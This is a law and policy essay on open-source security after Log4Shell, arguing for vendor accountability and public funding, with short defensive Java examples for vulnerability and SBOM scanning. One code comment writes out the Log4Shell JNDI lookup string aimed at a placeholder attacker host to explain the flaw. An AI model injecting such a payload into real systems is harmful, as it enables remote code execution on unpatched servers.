Open-Source Security: How Digital Infrastructure Is Built on a House of Cards

Chinmayi Sharma
Monday, July 25, 2022, 8:01 AM

Log4Shell remains a national concern because the open-source community cannot continue to shoulder the responsibility of securing this critical asset and vendors are not exercising due care in incorporating open-source components into their products. A comprehensive institutional response to the incentives problem is needed. 

("Hackers (pt. 2)" by Ifrah Yousuf is licensed under CC BY 4.0 (https://cybervisuals.org/visual/hackers-pt-2//https://creativecommons.org/licenses/by/4.0/)


Editor's note: An expanded version of this article is now available in the North Carolina Law Review under the title "Tragedy of the Digital Commons." In it, the author captures the ongoing developments in the open-source security space and offers a deeper analysis of its underlying problems. The author concludes that this is not an open-source problem—it is a tragedy of the commons problem.

Open source is free software built collaboratively by a community of developers, often volunteers, for public use. Google, iPhones, the national power grid, surgical operating rooms, baby monitors, and military databases all run on this unique asset. 

However, open source has an urgent security problem. Open source is more ubiquitous, and more exposed to persistent threats, than ever before. The proprietary software industry has responded to those threats by implementing thorough institutional security measures. The same care is not being given to open-source software—primarily due to misaligned incentives. 

First, open source’s primary beneficiaries—software vendors who profit from its use—are free-riders who lack incentives to contribute to the open-source projects they use. Second, these software vendors also lack incentives to secure the open-source code they use, introducing potentially vulnerable products into the software ecosystem. 

Attempts to address the open-source problem do not go far enough—a comprehensive institutional response to the incentives problem is needed.

Open Source Has a Security Problem

The free and critical software that keeps society online remains at risk. In early July, the Cybersecurity and Infrastructure Security Agency (CISA) and U.S. Coast Guard Cyber Command (CGCYBER) issued a joint cybersecurity advisory. The advisory warned companies that hackers, including state-sponsored advanced persistent threat (APT) actors, continue to exploit organizations that failed to patch the Log4Shell vulnerability, gaining unfettered access to proprietary systems. Just last week, the Cyber Safety Review Board, established by the Biden administration last year to systematically review and learn from cyber incidents, released its first report analyzing the Log4Shell incident and its implications. It echoed CISA’s concern about the vulnerability’s lasting impact on critical system security.

Log4j is Apache’s open-source, Java-based error-logging library, used by major companies like Google and by governments alike. The vulnerability in Log4j, called Log4Shell, is said to have existed since 2013. Due to the nature of open source, this one bug, originally discovered in the Minecraft video game, risked taking down networks worldwide. Despite this risk, an April 2022 expert security report found that 60 percent of the nearly 3 billion devices affected by the Log4Shell vulnerability remain unpatched, even though it has been seven months since the vulnerability was discovered. Log4Shell remains a national concern because vendors are not exercising due care in incorporating open-source components into their products.
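To make the mechanics concrete, the sketch below shows the kind of routine logging call that was exploitable. It is a minimal illustration, not code from any affected product; the class name and the attacker domain are hypothetical.

```java
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class LoginHandler {
    private static final Logger logger = LogManager.getLogger(LoginHandler.class);

    void handleFailedLogin(String username) {
        // In vulnerable Log4j versions (2.0-beta9 through 2.14.1), this
        // ordinary call is enough to be exploited: if an attacker submits
        // the username "${jndi:ldap://attacker.example.com/a}", Log4j
        // resolves the JNDI lookup inside the logged message, contacts the
        // attacker's server, and can be made to load and run remote code.
        logger.error("Failed login attempt for user: {}", username);
    }
}
```

Nothing in the call itself looks unsafe; the danger lives entirely in how the library interprets the data it is asked to log, which is why unpatched copies buried deep in a product’s dependency tree are so hard to spot.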

This lack of due care puts individuals’ data at risk, exposes companies’ intellectual property to theft, and endangers sensitive national security information. CISA Director Jen Easterly called Log4Shell “one of the most serious that I’ve seen in my entire career, if not the most serious.” It received a Common Vulnerability Scoring System (CVSS) severity score of 10 out of 10. (CVSS v3 is an open framework for describing the severity and characteristics of software vulnerabilities.) Despite these dire warnings, many companies continue to drag their feet in implementing the free and publicly available patches that would secure their systems against exploits of the vulnerability. 

The Log4Shell vulnerability is not alone: It is just one in a series of vulnerabilities found and exploited in open-source libraries. Most notably, the Equifax hack, which compromised the personal information of nearly 150 million Americans, was courtesy of an unpatched open-source vulnerability. Importantly, the culprit was not the developers of the code but the company, which failed to implement a patch that would have prevented exactly what happened. Many observers complain that Equifax has suffered little consequence for its negligence, highlighting weak oversight and accountability structures. Just last month, the same type of open-source vulnerability at the root of the Equifax hack was found in popular Atlassian products. The vulnerability has been deemed critical on a severity scale and will impact affected devices “for at least the next couple of years.” 

Open Source and Its Vulnerabilities Are Everywhere 

An April 2022 industry study found that 97 percent of software contains some amount of open source. Open-source code was found in 100 percent of systems related to computer hardware and semiconductors, cybersecurity, energy and clean tech, “Internet of Things” devices, and internet and mobile app software. And it is not a negligible amount of open-source code—78 percent of the code reviewed was open source. Most concerningly, 81 percent of the codebases containing open source had at least one vulnerability, with an average of five unpatched high-risk or critical vulnerabilities per application. 

But, open source’s ubiquity and the characteristics that make it valuable are also what make it a unique risk to digital infrastructure. With proprietary code, or closed software, a vulnerability would impact only that company and its customers. While these threats are still severe (like with SolarWinds), they are outmatched in scope by a vulnerability found in open-source software. When the same piece of code is used by hundreds of thousands of networks internationally, one vulnerability in one project can take countless critical systems offline. 

The solution is not to move away from open source. Freely available software offers numerous public policy benefits—from decreasing barriers to entry to increasing innovation. Simply put, its primary beneficiaries save the cost of developing or purchasing proprietary code by using open source instead, allowing them to invest limited resources in other valuable endeavors. The United States owes its dominance in technological innovation in large part to open-source code.

Moreover, open source is not inherently less secure than proprietary code: 89 percent of information technology executives believe that open source is at least as secure as proprietary code. Source code visibility has not been found to correlate with increased security risk. Rather, it can make projects more stable and secure. Indeed, corporations and government agencies recognize this. They are moving away from relying primarily on proprietary software, or closed-source systems, toward using more open-source code, according to a February Red Hat study. Corporations are setting up open-source program offices (OSPOs) to coordinate their use of open source, and the Department of Defense has a formal policy permitting the use of open source in critical government systems. 

The issue is not the code: It is the lack of institutions securing the code. 

Open Source’s Problems: Resources and Incentives

Open source, like many public goods, suffers from a free-rider problem. The resource is free, so anyone can use it. And it is infinitely reproducible, so any number of people can use it simultaneously. Roads and bridges are technically free to use too; however, as many of us have personally experienced, they are susceptible to overuse. Overuse without adequate maintenance leads to deterioration, sometimes rendering these resources wholly unusable. Open source suffers an analogous overuse problem: Code does not wear out, but as projects grow in popularity, the maintenance they demand grows with them—and that support is not materializing. 

About 30 percent of open-source projects, including some of the most popular ones, have only one maintainer (a developer tasked with reviewing code contributions, scanning for vulnerabilities, and addressing reported bugs). The 2014 Heartbleed attack—which affected nearly one-fifth of the internet—exploited a vulnerability in an open-source library that was maintained by two full-time developers who were solely responsible for over 500,000 lines of code. If software development resources were allocated optimally, then attacks like Heartbleed and Log4Shell could have been avoided. 

But, as is characteristic of public goods, market participants lack incentives to correct this inefficiency. Companies can profit from open source without expending any resources to improve it. Psychologists call this the bystander effect. When multiple parties have the capacity to solve a problem, each individual party feels less responsibility to take action. Although securing this public good is in every company’s self-interest, very few companies want to be the ones to take on that burden. There is little reason to think the market will correct itself without intervention. 

Researchers have called for targeted investments from government and consumers of open-source projects to fund more full-time maintainers for important projects and entities offering open-source security services for free. The open-source community has requested upstream contributions from its consumers—support in the form of code review and improvement. The open-source community is doing the best it can to maintain the large, critical projects the public relies on. To avoid open-source potholes, its developers need resources for sustained maintenance. Tax dollars fund public roads and bridges. Open source deserves the same support. 

Don’t Forget the Vendor

The weakest link in the software supply chain is the irresponsible software vendor. Even if the open-source community had all the resources it needed, open-source code would remain vulnerable due to poor vendor security practices. Heartbleed is illustrative. The open-source community responded rapidly, developing and distributing a patch on the same day the vulnerability was disclosed. Yet as of July 19, over 41,000 devices remain vulnerable.

Software vendors take open-source code out of the incubator, where it has no real-world effect, and incorporate it into a product they sell to the public. Often, there are several vendors in between the open-source developers building the project and the end users buying the product that uses that project. And vulnerabilities can be introduced at every stage of the supply chain. But they can also be mitigated at every link of the supply chain. 

Why are software vendors so lax about open-source security practices? Because the only way to find an open-source vulnerability is to proactively look for it. With their proprietary code, vendors are not similarly limited: They can learn about vulnerabilities from security researchers, impacted customers, and upstream vendors contractually obligated to inform their customers about vulnerabilities. They are more likely to lean on these sources than to spend money on open-source security that they could be using to protect their proprietary code. And the same incentives to find and disclose vulnerabilities do not govern open-source code. Unlike proprietary code, open-source code confers no intellectual property benefits on vendors, is not visibly tied to the vendor’s brand or reputation, is not governed by stringent contractual obligations, is not disclosed in contracts, and does not undergo the same rigorous code review. 

Software vendors regularly fail to scan for known and unknown vulnerabilities in the open-source code they use while building their products in the first instance—selling a product whose integrity cannot be assured. They often fail to keep scanning their products for open-source vulnerabilities discovered after the software has been sold. Software is dynamic: While the code in a product may not change, new vulnerabilities are identified daily, creating an ongoing risk that the software can be exploited. The Log4Shell vulnerability illustrated the importance of repeated scans—Log4Shell was not a known vulnerability when vendors first incorporated the code into their products. Only those who scanned again later had a chance to find it.
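A minimal sketch of what recurring scanning can look like, using the free OSV.dev vulnerability API (a real public service; the class name and the choice to hard-code a single dependency are illustrative assumptions):

```java
import java.net.URI;
import java.net.http.HttpClient;
import java.net.http.HttpRequest;
import java.net.http.HttpResponse;

public class DependencyRescan {
    public static void main(String[] args) throws Exception {
        // Ask the OSV.dev database whether any advisories have been
        // published against one pinned dependency. The coordinates below
        // are Log4j's real Maven coordinates, at the last pre-patch version.
        String query = """
                {"package": {"name": "org.apache.logging.log4j:log4j-core",
                             "ecosystem": "Maven"},
                 "version": "2.14.1"}""";

        HttpRequest request = HttpRequest.newBuilder()
                .uri(URI.create("https://api.osv.dev/v1/query"))
                .header("Content-Type", "application/json")
                .POST(HttpRequest.BodyPublishers.ofString(query))
                .build();

        HttpResponse<String> response = HttpClient.newHttpClient()
                .send(request, HttpResponse.BodyHandlers.ofString());

        // An empty "vulns" array means no known advisories today; the same
        // call tomorrow may say otherwise, which is why scanning must recur.
        System.out.println(response.body());
    }
}
```

Run against Log4j 2.14.1, this query should return advisories including CVE-2021-44228. Run the day that version shipped, it would have returned nothing—a single scan at build time is not enough.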

Finally, some vendors fail to patch their software upon identifying a new vulnerability and to provide that patch to affected customers. Even if a vendor scans for new vulnerabilities, it is a separate task to determine which vulnerabilities actually affect its products. Not all vulnerabilities in an open-source library require urgent fixes, but some do. Some vendors avoid this analysis and instead wait for evidence that their products have been impacted before issuing a patch to customers. At that point, it can be too late. CISA has issued guidance recommending a Vulnerability Exploitability eXchange (VEX) document, which would proactively inform customers whether the product they were sold contains a vulnerability that requires a patch. Vendors are best positioned to separate the signal from the noise.

Current Interventions Are Not Enough 

What has been done about this? The question of software security has been on the government’s radar for a while. Since the Log4Shell incident, the Federal Trade Commission (FTC) has threatened companies that are slow to implement patches with enforcement actions. Even before Log4Shell, the White House issued an executive order addressing the software supply chain. The order required those companies selling to the federal government to take precautionary measures to identify and remediate vulnerabilities in software and to provide agency customers with a software bill of materials (SBOM) enumerating the various software components, including open-source components, contained in their products. 

SBOMs are useful. Without them, even the largest, most sophisticated technology companies took weeks just to identify where they were vulnerable to attack, let alone patch each of the affected components. With an SBOM, a company can pinpoint where a reported vulnerability sits in its systems, increasing the speed with which it can fix the issue. The Biden administration imposed requirements on federal contractors, many of which are the largest technology companies, hoping the rest of the industry would feel pressured to follow suit. 

But, SBOMs are insufficient. Thousands of devices remain vulnerable to Log4Shell, and companies take, on average, 98 days to fix a vulnerability. This shows that existing requirements are too little, too late in the software lifecycle. They remain entirely voluntary for companies that do not sell to the federal government. And they do not address the failures of intermediaries who first introduce open-source code into software earlier in the supply chain. SBOM requirements and threats of enforcement actions for failure to patch vulnerabilities will not, on their own, provide the necessary institutional oversight of open source. 

An SBOM is simply a list of the ingredients, or codebases, that make up the software you purchased. It does not provide a list of vulnerabilities, nor does it impose any minimum security requirements on the vendor generating the SBOM. Like the list of ingredients on a snack or medication you purchase, the information is only as useful as your ability to parse it. 

To operationalize an SBOM, a company must first be able to read it, which is a challenge because there is no mandated standard format for SBOMs. It must then actually use it: checking databases such as the National Vulnerability Database (NVD) for new vulnerabilities found in the software components the SBOM lists. These activities are costly and cumbersome. While Google and Intel might have the resources and security maturity to demand machine-readable SBOMs and regularly scan databases for new vulnerabilities that impact their systems, there are countless small businesses using open source that cannot. 
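For a sense of the first half of that work, the sketch below reads a machine-readable SBOM in the CycloneDX JSON format (one of the two common formats, alongside SPDX) and lists each component. It assumes the Jackson JSON library is available, and the file name is hypothetical.

```java
import com.fasterxml.jackson.databind.JsonNode;
import com.fasterxml.jackson.databind.ObjectMapper;
import java.io.File;

public class SbomInventory {
    public static void main(String[] args) throws Exception {
        // Read a CycloneDX JSON SBOM supplied by a vendor. The "components"
        // array holds one entry per ingredient in the product.
        JsonNode sbom = new ObjectMapper().readTree(new File("vendor-product.cdx.json"));

        for (JsonNode component : sbom.path("components")) {
            // The package URL ("purl") is the identifier needed to look the
            // component up in vulnerability databases such as the NVD or OSV.
            System.out.printf("%s %s -> %s%n",
                    component.path("name").asText(),
                    component.path("version").asText(),
                    component.path("purl").asText("<no purl>"));
        }
    }
}
```

Each extracted package URL can then feed a lookup like the OSV query sketched earlier. The gap is that most small businesses have neither this tooling nor the staff to run it continuously.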

These small businesses are the companies driving statistics like the number of outstanding critical vulnerabilities and the average days to patch. One study found that 43 percent of all cyberattacks target small to medium-sized businesses. These businesses are limited in their ability to respond to security issues reactively, which underscores the importance of shifting security left and developing more proactive measures.

Therefore, institutions must impose security requirements on software vendors, just as minimum quality requirements are imposed on foods and drugs. Smaller, less sophisticated companies are beholden to the information provided by their software vendors, who may or may not be providing them with accurate SBOMs and the timely patches they need to secure their systems. A small business needs to be able to trust its vendor and cannot be expected to recreate the security checks a vendor should be doing.

Liability for any harm caused by an open-source vulnerability should lie with the party most at fault. Currently, software vendors attempt to shift security liability onto open-source maintainers by soliciting certifications of security practices via gargantuan questionnaires. They also attempt to disclaim all warranties on their products, shifting any liability for a defect to the end user. However, when a design or manufacturing defect in a product, such as a car, injures a consumer, the law holds accountable every link in the supply chain capable of having identified and remediated the defect. National Cyber Director Chris Inglis has suggested a similar approach for open source. 

Software vendors are best positioned to know the open-source code their software contains and to remediate vulnerabilities. They are the least cost avoider and reap the greatest monetary reward from these open-source libraries. The only open-source project with no vulnerabilities is the one with no users—by exposing the public to open source, vendors arguably introduce the vulnerability. It thus stands to reason that they should bear responsibility for finding and patching flaws. Minimum standards and accountability structures would expose vendors to liability, thereby motivating them to preemptively invest in better security practices.

Open Source Cannot Do It Alone

The open-source community is aware of its security problem. In fact, the community is already attempting to build out institutions and standards to secure open source. For example, the Open Source Security Foundation, or OpenSSF, has already met with the White House twice and has 10 dedicated workstreams all focused on securing the open-source ecosystem. Companies like Microsoft and Google, large open-source contributors, have pledged $30 million to support OpenSSF’s efforts. The Open Source Technology Improvement Fund (OSTIF) was founded recently to provide free security auditing services to open-source projects and continues to grow.

However, on its own, the open-source community does not have the leverage to demand the resources and minimum security practices required. To preserve its core ethos as a free service and commodity, the open-source community cannot impose conditional requirements on its projects. As a collaborative of many volunteer developers, it also struggles to impose requirements on its own contributors. 

Recently, one of the most popular collections of open-source projects, the Python Package Index (PyPI), announced that it will impose minimum security measures on “critical” projects—the top 1 percent of downloaded projects. This comes out to about 3,500 projects, whose maintainers must secure their accounts with two-factor authentication to continue contributing. The announcement prompted an outcry from the community—authors of extremely popular projects threatened to abandon their posts, which could break the systems of any end user reliant on that code.

This development provides three lessons. One, the open-source community recognizes the need to raise minimum security standards. Two, the open-source community, no matter how well-intentioned, cannot accomplish that alone. And three, raising the floor on open-source security will be met with pushback and an exodus from the open-source community. This makes the development of an institutional response even more pressing—critical projects need to remain sufficiently resourced and maintained. 

Protecting a Critical Public Asset 

Open source is at least as important to the economy, public services, and national security as proprietary code, but it lacks the same standards and safeguards. It bears the qualities of a public good and is as indispensable as national highways. Given open source’s value as a public asset, an institutional structure must be built that sustains and secures it. 

This is not a novel idea. Open-source code has been called the “roads and bridges” of current digital infrastructure, warranting the same “focus and funding.” Eric Brewer of Google explicitly called open-source software “critical infrastructure” in a recent keynote at the Open Source Summit in Austin, Texas. Several nations have adopted regulations recognizing open-source projects as significant public assets, central to their most important systems and services. Germany wants to treat open-source software as a public good and has launched a Sovereign Tech Fund to support open-source projects “just as much as bridges and roads,” and not just when a bridge collapses. The European Union adopted a formal open-source strategy that encourages it to “explore opportunities for dedicated support services for open source solutions [it] considers critical.” 

Designing an institutional framework to secure open source requires addressing adverse incentives, ensuring efficient resource allocation, and imposing minimum standards. But not all open-source projects are created equal. The first step is to identify which projects warrant this heightened level of scrutiny—projects that are critical to society. CISA defines critical infrastructure as industry sectors “so vital to the United States that [their] incapacity or destruction would have a debilitating impact on our physical or economic security or public health or safety.” Efforts should target the open-source projects that share those features. 


Chinmayi Sharma is an Associate Professor at Fordham Law School. Her research and teaching focus on internet governance, platform accountability, cybersecurity, and computer crime/criminal procedure. Before joining academia, Chinmayi worked at Harris, Wiltshire & Grannis LLP, a telecommunications law firm in Washington, D.C., clerked for Chief Judge Michael F. Urbanski of the Western District of Virginia, and co-founded a software development company.
